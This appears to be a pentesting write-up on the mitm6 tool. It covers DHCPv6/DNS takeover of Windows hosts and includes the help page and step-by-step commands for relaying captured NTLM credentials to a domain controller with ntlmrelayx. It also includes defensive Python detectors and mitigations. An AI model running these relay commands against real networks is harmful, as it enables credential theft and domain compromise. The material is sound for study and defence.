
MITM6

Overview

MITM6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker's host as the default DNS server. Windows hosts request DHCPv6 configuration by default and prefer an IPv6 DNS server over an IPv4 one, so this works on networks that otherwise only use IPv4. As the DNS server, MITM6 selectively replies to DNS queries of the attacker's choosing and redirects the victims' traffic to the attacker machine instead of the legitimate server. [1]

MITM6 can also be combined with credential relay attacks: the Impacket ntlmrelayx tool relays the captured NTLM authentication, and the krbrelayx tool relays Kerberos authentication.

MITM6 comes packaged with Kali Linux by default.

| Tool Name | Version | MITRE ATT&CK Tactic | MITRE ATT&CK Technique |
| --- | --- | --- | --- |
| mitm6 | v0.3.0 | Credential Access | Adversary-in-the-Middle |
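The DHCPv6 stage described above is the part a network sensor can catch: any DHCPv6 Advertise or Reply that hands clients a link-local address as their DNS server is characteristic of mitm6, because a legitimate DHCPv6 server offers routable resolvers. The parser and check below are an added example written for this page, not code from mitm6 or from the post; the message layout follows RFC 8415, while the authorized resolver 2001:db8::53, the rogue fe80::1 address and the server DUIDs are constructed sample values.

```python
import ipaddress
import struct

# DHCPv6 message types and option codes (RFC 8415)
MSG_SOLICIT = 1
MSG_ADVERTISE = 2
MSG_REPLY = 7
OPT_SERVERID = 2
OPT_DNS_SERVERS = 23
OPT_DOMAIN_LIST = 24

LINK_LOCAL = ipaddress.IPv6Network("fe80::/10")


def parse_options(data):
    """Yield (option-code, payload) for each TLV option in a DHCPv6 message body."""
    off = 0
    while off + 4 <= len(data):
        code, length = struct.unpack("!HH", data[off:off + 4])
        off += 4
        payload = data[off:off + length]
        if len(payload) != length:
            raise ValueError("truncated DHCPv6 option")
        off += length
        yield code, payload


def parse_domain_list(payload):
    """Decode the uncompressed DNS wire-format names carried in OPTION_DOMAIN_LIST."""
    names, off = [], 0
    while off < len(payload):
        labels = []
        while True:
            n = payload[off]
            off += 1
            if n == 0:
                break
            labels.append(payload[off:off + n].decode("ascii"))
            off += n
        names.append(".".join(labels))
    return names


def parse_message(raw):
    """Parse msg-type, transaction id and the options relevant to DNS takeover."""
    if len(raw) < 4:
        raise ValueError("too short for DHCPv6")
    info = {"msg_type": raw[0], "xid": int.from_bytes(raw[1:4], "big"),
            "dns_servers": [], "search_domains": [], "server_duid": None}
    for code, payload in parse_options(raw[4:]):
        if code == OPT_DNS_SERVERS:
            if len(payload) % 16:
                raise ValueError("bad OPTION_DNS_SERVERS length")
            info["dns_servers"] += [ipaddress.IPv6Address(payload[i:i + 16])
                                    for i in range(0, len(payload), 16)]
        elif code == OPT_DOMAIN_LIST:
            info["search_domains"] += parse_domain_list(payload)
        elif code == OPT_SERVERID:
            info["server_duid"] = payload.hex()
    return info


def assess(raw, authorized_dns):
    """Return findings for a server-originated message; client messages produce none."""
    msg = parse_message(raw)
    findings = []
    if msg["msg_type"] not in (MSG_ADVERTISE, MSG_REPLY):
        return findings
    for srv in msg["dns_servers"]:
        if srv in LINK_LOCAL:
            findings.append(f"link-local DNS server {srv} offered (mitm6-style rogue DHCPv6)")
        elif srv not in authorized_dns:
            findings.append(f"unauthorized DNS server {srv} offered")
    return findings


# --- constructed sample messages (not captured traffic) ---
def build_option(code, payload):
    return struct.pack("!HH", code, len(payload)) + payload


def build_message(msg_type, xid, options):
    return bytes([msg_type]) + xid.to_bytes(3, "big") + b"".join(options)


def encode_domain_list(names):
    out = b""
    for name in names:
        for label in name.split("."):
            out += bytes([len(label)]) + label.encode("ascii")
        out += b"\x00"
    return out


AUTHORIZED_DNS = {ipaddress.IPv6Address("2001:db8::53")}  # assumed corporate resolver

LEGIT_ADVERTISE = build_message(MSG_ADVERTISE, 0xABCDEF, [
    build_option(OPT_SERVERID, bytes.fromhex("000100011c39cf88080027fe8f95")),  # made-up DUID-LLT
    build_option(OPT_DNS_SERVERS, ipaddress.IPv6Address("2001:db8::53").packed),
    build_option(OPT_DOMAIN_LIST, encode_domain_list(["corp.example"])),
])

ROGUE_ADVERTISE = build_message(MSG_ADVERTISE, 0x123456, [
    build_option(OPT_SERVERID, bytes.fromhex("00030001deadbeef0001")),  # made-up DUID-LL
    build_option(OPT_DNS_SERVERS, ipaddress.IPv6Address("fe80::1").packed),  # link-local resolver
    build_option(OPT_DOMAIN_LIST, encode_domain_list(["corp.example"])),
])

if __name__ == "__main__":
    for label, raw in (("legit", LEGIT_ADVERTISE), ("rogue", ROGUE_ADVERTISE)):
        print(label, assess(raw, AUTHORIZED_DNS) or ["clean"])
```

In practice the raw bytes would come from a packet capture filtered on UDP port 546 (client side) or 547 (server side); the server DUID is kept in the parsed result so a sensor can also alert on any DUID that is not the known DHCPv6 server's.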

MITM6 Help Page

usage: mitm6 [-h] [-i INTERFACE] [-l LOCALDOMAIN] [-4 ADDRESS] [-6 ADDRESS]
             [-m ADDRESS] [-a] [-r TARGET] [-v] [--debug] [-d DOMAIN]
             [-b DOMAIN] [-hw DOMAIN] [-hb DOMAIN] [--ignore-nofqdn]

mitm6 - pwning IPv4 via IPv6
For help or reporting issues, visit https://github.com/dirkjanm/mitm6

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Interface to use (default: autodetect)
  -l LOCALDOMAIN, --localdomain LOCALDOMAIN
                        Domain name to use as DNS search domain (default: use
                        first DNS domain)
  -4 ADDRESS, --ipv4 ADDRESS
                        IPv4 address to send packets from (default:
                        autodetect)
  -6 ADDRESS, --ipv6 ADDRESS
                        IPv6 link-local address to send packets from (default:
                        autodetect)
  -m ADDRESS, --mac ADDRESS
                        Custom mac address - probably breaks stuff (default:
                        mac of selected interface)
  -a, --no-ra           Do not advertise ourselves (useful for networks which
                        detect rogue Router Advertisements)
  -r TARGET, --relay TARGET
                        Authentication relay target, will be used as fake DNS
                        server hostname to trigger Kerberos auth
  -v, --verbose         Show verbose information
  --debug               Show debug information

Filtering options:
  -d DOMAIN, --domain DOMAIN
                        Domain name to filter DNS queries on (Allowlist
                        principle, multiple can be specified.)
  -b DOMAIN, --blocklist DOMAIN, --blacklist DOMAIN
                        Domain name to filter DNS queries on (Blocklist
                        principle, multiple can be specified.)
  -hw DOMAIN, -ha DOMAIN, --host-allowlist DOMAIN, --host-whitelist DOMAIN
                        Hostname (FQDN) to filter DHCPv6 queries on (Allowlist
                        principle, multiple can be specified.)
  -hb DOMAIN, --host-blocklist DOMAIN, --host-blacklist DOMAIN
                        Hostname (FQDN) to filter DHCPv6 queries on (Blocklist
                        principle, multiple can be specified.)
  --ignore-nofqdn       Ignore DHCPv6 queries that do not contain the Fully
                        Qualified Domain Name (FQDN) option.

Instructions

Using MITM6 to Perform an NTLM Relay Attack

  1. Execute the command below on the attacker machine. Ensure that the -i switch is set to an interface on the same network as the target and that -d is set to the local domain being targeted.

     sudo mitm6 -i eth0 -d darkcybe.malnet
  2. Using the Impacket ntlmrelayx.py script, set the relay target with the -t switch; in this example it is the Domain Controller running LDAPS. -wh names the malicious WPAD host and -l creates a local file on the attacker machine into which the discovered loot is dropped. [2]

     ntlmrelayx.py -6 -t ldaps://10.10.10.10 -wh malwpad.darkcybe.malnet -l lootcrate
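The relay step above only works because clients now resolve the WPAD name, and everything else, through the rogue resolver. The scan below is an added example, not code from the post or from Impacket; it runs a few detection rules over a constructed resolver-activity log (the whitespace-separated column layout, timestamps, addresses and the corp.example names are made up for the example, and the authorized resolver set is an assumption). It flags clients that sent queries to a link-local or unauthorized resolver, WPAD names that resolved at all, and AAAA answers inside the link-local range.

```python
import ipaddress

# Constructed log, not real data. Columns: ts  client  resolver  qname  qtype  answer
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.10.10.45 10.10.10.10 dc01.corp.example A 10.10.10.10
2024-05-01T09:00:02Z 10.10.10.45 fe80::1 wpad.corp.example A 10.10.10.99
2024-05-01T09:00:03Z 10.10.10.46 fe80::1 dc01.corp.example AAAA fe80::1
2024-05-01T09:00:04Z 10.10.10.47 10.10.10.10 wpad.corp.example A NXDOMAIN
"""

# Assumed set of resolvers clients are allowed to talk to
AUTHORIZED_RESOLVERS = {ipaddress.ip_address("10.10.10.10"),
                        ipaddress.ip_address("2001:db8::53")}
LINK_LOCAL_V6 = ipaddress.IPv6Network("fe80::/10")


def parse_log(text):
    """Turn the constructed log into records; blank lines and '#' comments are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, client, resolver, qname, qtype, answer = line.split()
        records.append({"ts": ts, "client": client,
                        "resolver": ipaddress.ip_address(resolver),
                        "qname": qname.lower(), "qtype": qtype, "answer": answer})
    return records


def scan(records, authorized):
    """Return (ts, client, reason) tuples for every rule a record trips."""
    findings = []
    for r in records:
        reasons = []
        res = r["resolver"]
        if res.version == 6 and res in LINK_LOCAL_V6:
            # A link-local resolver is what a rogue DHCPv6 server hands out
            reasons.append(f"resolver {res} is link-local")
        elif res not in authorized:
            reasons.append(f"resolver {res} not in authorized set")
        if r["qname"].startswith("wpad.") and r["answer"] != "NXDOMAIN":
            # WPAD should not resolve where auto-proxy discovery is disabled
            reasons.append(f"WPAD name {r['qname']} resolved to {r['answer']}")
        if r["qtype"] == "AAAA" and r["answer"] != "NXDOMAIN":
            try:
                if ipaddress.IPv6Address(r["answer"]) in LINK_LOCAL_V6:
                    reasons.append(f"AAAA answer {r['answer']} is link-local")
            except ValueError:
                pass  # not an address (e.g. SERVFAIL); ignore
        for reason in reasons:
            findings.append((r["ts"], r["client"], reason))
    return findings


if __name__ == "__main__":
    for ts, client, reason in scan(parse_log(SAMPLE_LOG), AUTHORIZED_RESOLVERS):
        print(ts, client, reason)
```

Alongside detection, the usual mitigations are to stop clients accepting DHCPv6 and Router Advertisements from untrusted hosts (Windows Firewall rules for that traffic), to disable WPAD via Group Policy where proxy auto-discovery is not needed, and to require LDAP signing and channel binding so that relayed NTLM authentication to LDAP/LDAPS is rejected.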

Sources

This post is licensed under CC BY 4.0 by the author.